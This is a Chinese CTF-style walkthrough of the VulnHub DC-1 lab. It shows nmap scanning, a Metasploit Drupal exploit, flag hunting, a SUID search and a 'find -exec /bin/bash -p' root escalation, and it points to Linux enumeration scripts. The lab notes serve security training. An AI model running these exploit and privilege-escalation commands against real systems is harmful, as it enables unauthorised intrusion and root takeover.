Vulnhub靶场DC-1 渗透测试笔记

张

张建站

2026/5/7 1:30:37

10分钟阅读

靶场地址DC: 1 ~ VulnHub信息打点kali扫描存活网段ip,排除kali本身得到靶场ip192.168.72.137端口全扫描nmap -A 192.168.72.137拿到webshell指纹识别查找历史漏洞search drupaluse 1show options(查看配置)set rhosts 192.168.72.137run通过msf进入shell查看泄露信息flag1.txtshelllscat flag1.txtEvery good CMS needs a config file - and so do you.翻译过来就是每一个内容管理系统都需要配置文件提示找配置文件固定得到了flag2和数据库配置信息flag2提示提升权限为root来查看敏感文件或者直接爆破suid提权find / -perm -4000 -type f 2/dev/null查找可以用的suid提权find . -exec /bin/bash -p \; -quit(提权命令)id/whoami(提权验证)这里推荐几个综合提权项目可以通过上传对系统进行初步测试https://github.com/carlospolop/PEASS-nghttps://github.com/diego-treitos/linux-smart-enumerationhttps://github.com/redcode-labs/Basharkhttps://github.com/rebootuser/LinEnum插件提权upload /home/kali/lse.sh /tmp/lse.sh上传检测脚本ls -al /tmp(查看是否上传成功)chmod 755 /tmp/lse.sh给到执行权限bash /tmp/lse.sh运行)拿到通关flagls -al /rootcat /root/thefinalflag.txt总结1.思路web入口webshellflag1数据库flag2提权flag4.txt2.综合提权脚本只能进行初步检测为我们提供权限提升方向

临床问答系统：基于深度学习的医疗决策支持技术

1. 临床问答系统概述医疗领域的信息检索与问答一直是个极具挑战性的任务。当医生在临床工作中遇到疑难病例时，往往需要快速获取权威的医学证据来支持诊断决策。传统的人工检索方式效率低下，而普通的搜索引擎又难以提供精准可靠的医学答案。这就是临床问…...

2026/5/7 1:30:30 阅读更多 →

【IEEE顶刊复现】主动配电网鲁棒故障恢复【两阶段鲁棒模型+确定性模型】研究（Matlab代码实现）

💥💥💞💞欢迎来到本博客❤️❤️💥💥 🏆博主优势：🌞🌞🌞博客内容尽量做到思维缜密，逻辑清晰，为了方便读者。 ⛳️座右铭&a…...

2026/5/7 1:29:32 阅读更多 →

Python习题集：程序8

程序8题目：输出9*9 口诀表。代码：for i in range(1, 10):for j in range(1, i1):print(f{j} {i} {format((i * j),"<2")}, end )print()成果：1 1 1 1 2 2 2 2 4 1 3 3 2 3 6 3 3 9 1 4 4 2 …...

2026/5/7 1:23:32 阅读更多 →